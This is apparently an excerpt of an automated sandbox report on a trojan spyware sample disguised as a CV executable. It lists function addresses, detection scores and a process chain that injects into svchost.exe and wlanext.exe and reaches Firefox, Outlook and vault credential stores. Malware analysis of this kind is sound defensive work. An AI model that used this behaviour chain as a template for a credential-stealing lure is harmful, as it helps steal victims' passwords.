Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0032724D	0_2_0032724D
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002F93F0	0_2_002F93F0
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003313CA	0_2_003313CA
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0030F563	0_2_0030F563
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002F96C0	0_2_002F96C0
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0033B6CC	0_2_0033B6CC
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002F77B0	0_2_002F77B0
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0035F7FF	0_2_0035F7FF
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_003279C9	0_2_003279C9
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0030FA57	0_2_0030FA57
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002F9B60	0_2_002F9B60
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002F7D19	0_2_002F7D19
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0030FE6F	0_2_0030FE6F
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00319ED0	0_2_00319ED0
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_002F7FA3	0_2_002F7FA3
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_01376D40	0_2_01376D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004185C3	1_2_004185C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E003	1_2_0040E003
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410013	1_2_00410013
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E148	1_2_0040E148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E153	1_2_0040E153
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042ED73	1_2_0042ED73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FDEA	1_2_0040FDEA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FDF3	1_2_0040FDF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402760	1_2_00402760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004167CE	1_2_004167CE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004167D3	1_2_004167D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041678C	1_2_0041678C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4E3F0	1_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D003E6	1_2_03D003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFA352	1_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC02C0	1_2_03CC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0274	1_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF81CC	1_2_03CF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF41A2	1_2_03CF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D001AA	1_2_03D001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CC8158	1_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30100	1_2_03C30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDA118	1_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD2000	1_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3C7C0	1_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C64750	1_2_03C64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40770	1_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5C6E0	1_2_03C5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D00591	1_2_03D00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40535	1_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEE4F6	1_2_03CEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF2446	1_2_03CF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE4420	1_2_03CE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF6BD7	1_2_03CF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFAB40	1_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3EA80	1_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C429A0	1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D0A9A6	1_2_03D0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C56962	1_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C6E8F0	1_2_03C6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C268B8	1_2_03C268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4A840	1_2_03C4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C42840	1_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C32FC8	1_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CBEFA0	1_2_03CBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB4F40	1_2_03CB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C82F28	1_2_03C82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C60F30	1_2_03C60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE2F30	1_2_03CE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFEEDB	1_2_03CFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C52E90	1_2_03C52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFCE93	1_2_03CFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40E59	1_2_03C40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFEE26	1_2_03CFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C3ADE0	1_2_03C3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C58DBF	1_2_03C58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4AD00	1_2_03C4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDCD1F	1_2_03CDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C30CF2	1_2_03C30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE0CB5	1_2_03CE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C40C00	1_2_03C40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C8739A	1_2_03C8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2D34C	1_2_03C2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF132D	1_2_03CF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5B2C0	1_2_03C5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE12ED	1_2_03CE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5D2F0	1_2_03C5D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C452A0	1_2_03C452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C4B1B0	1_2_03C4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C7516C	1_2_03C7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C2F172	1_2_03C2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03D0B16B	1_2_03D0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEF0CC	1_2_03CEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C470C0	1_2_03C470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF70E9	1_2_03CF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFF0E0	1_2_03CFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFF7B0	1_2_03CFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF16CC	1_2_03CF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C85630	1_2_03C85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDD5B0	1_2_03CDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF7571	1_2_03CF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C31460	1_2_03C31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFF43F	1_2_03CFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB5BF0	1_2_03CB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C7DBF9	1_2_03C7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5FB80	1_2_03C5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFFB76	1_2_03CFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CEDAC6	1_2_03CEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CDDAAC	1_2_03CDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C85AA0	1_2_03C85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CE1AA3	1_2_03CE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFFA49	1_2_03CFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF7A46	1_2_03CF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB3A6C	1_2_03CB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C49950	1_2_03C49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5B950	1_2_03C5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CD5910	1_2_03CD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C438E0	1_2_03C438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CAD800	1_2_03CAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C41F92	1_2_03C41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFFFB1	1_2_03CFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFFF09	1_2_03CFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C49EB0	1_2_03C49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C5FDC0	1_2_03C5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C43D40	1_2_03C43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF1D5A	1_2_03CF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CF7D73	1_2_03CF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CFFCF2	1_2_03CFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03CB9C32	1_2_03CB9C32

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C2B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C87E54 appears 101 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CBF290 appears 103 times
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: String function: 0030EC2F appears 68 times
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: String function: 00316AC0 appears 42 times
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: String function: 0031F8A0 appears 35 times

Source: CV_ Filipa Barbosa.exe, 00000000.00000003.1765066209.0000000003DCD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CV_ Filipa Barbosa.exe
Source: CV_ Filipa Barbosa.exe, 00000000.00000003.1766364071.0000000003C73000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CV_ Filipa Barbosa.exe

Source: CV_ Filipa Barbosa.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/5

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0033CE7A GetLastError,FormatMessageW,

0_2_0033CE7A

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0032AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0032AB84
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0032B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0032B134

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0033E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0033E1FD

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_00336532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00336532

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0034C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0034C18C

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_002F406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_002F406B

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

File created: C:\Users\user\AppData\Local\Temp\autDF5B.tmp

Jump to behavior

Source: CV_ Filipa Barbosa.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wlanext.exe, 00000006.00000003.2339495925.000000000058C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2997660019.000000000058C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: CV_ Filipa Barbosa.exe	ReversingLabs: Detection: 71%
Source: CV_ Filipa Barbosa.exe	Virustotal: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe"
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe"
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV_ Filipa Barbosa.exe"	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wlanext.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\wlanext.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: CV_ Filipa Barbosa.exe

Static file information: File size 1206784 > 1048576

Source: CV_ Filipa Barbosa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CV_ Filipa Barbosa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CV_ Filipa Barbosa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CV_ Filipa Barbosa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CV_ Filipa Barbosa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CV_ Filipa Barbosa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CV_ Filipa Barbosa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KzlgpZBFalChd.exe, 00000005.00000000.2081006806.0000000000EAE000.00000002.00000001.01000000.00000005.sdmp, KzlgpZBFalChd.exe, 00000007.00000000.2223307977.0000000000EAE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: CV_ Filipa Barbosa.exe, 00000000.00000003.1769047257.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, CV_ Filipa Barbosa.exe, 00000000.00000003.1766364071.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2156941988.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2156941988.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2060641634.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2058488879.0000000003800000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2159048079.0000000000968000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2999014442.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2999014442.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2156864856.00000000007BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CV_ Filipa Barbosa.exe, 00000000.00000003.1769047257.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, CV_ Filipa Barbosa.exe, 00000000.00000003.1766364071.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2156941988.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2156941988.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2060641634.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2058488879.0000000003800000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2159048079.0000000000968000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2999014442.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.2999014442.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.2156864856.00000000007BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: svchost.exe, 00000001.00000003.2125682005.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2125796310.000000000362D000.00000004.00000020.00020000.00000000.sdmp, KzlgpZBFalChd.exe, 00000005.00000002.2997873297.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: svchost.exe, 00000001.00000003.2125682005.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2125796310.000000000362D000.00000004.00000020.00020000.00000000.sdmp, KzlgpZBFalChd.exe, 00000005.00000002.2997873297.0000000000968000.00000004.00000020.00020000.00000000.sdmp

Source: CV_ Filipa Barbosa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CV_ Filipa Barbosa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CV_ Filipa Barbosa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CV_ Filipa Barbosa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CV_ Filipa Barbosa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe

Code function: 0_2_0030E01E LoadLibraryA,GetProcAddress,

0_2_0030E01E

Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0031C09E push esi; ret	0_2_0031C0A0
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0031C187 push edi; ret	0_2_0031C189
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0035C8BC push esi; ret	0_2_0035C8BE
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0030288B push 66003023h; retn 0036h	0_2_003028E1
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_00316B05 push ecx; ret	0_2_00316B18
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0033B2B1 push FFFFFF8Bh; iretd	0_2_0033B2B3
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0031BDAA push edi; ret	0_2_0031BDAC
Source: C:\Users\user\Desktop\CV_ Filipa Barbosa.exe	Code function: 0_2_0031BEC3 push esi; ret	0_2_0031BEC5
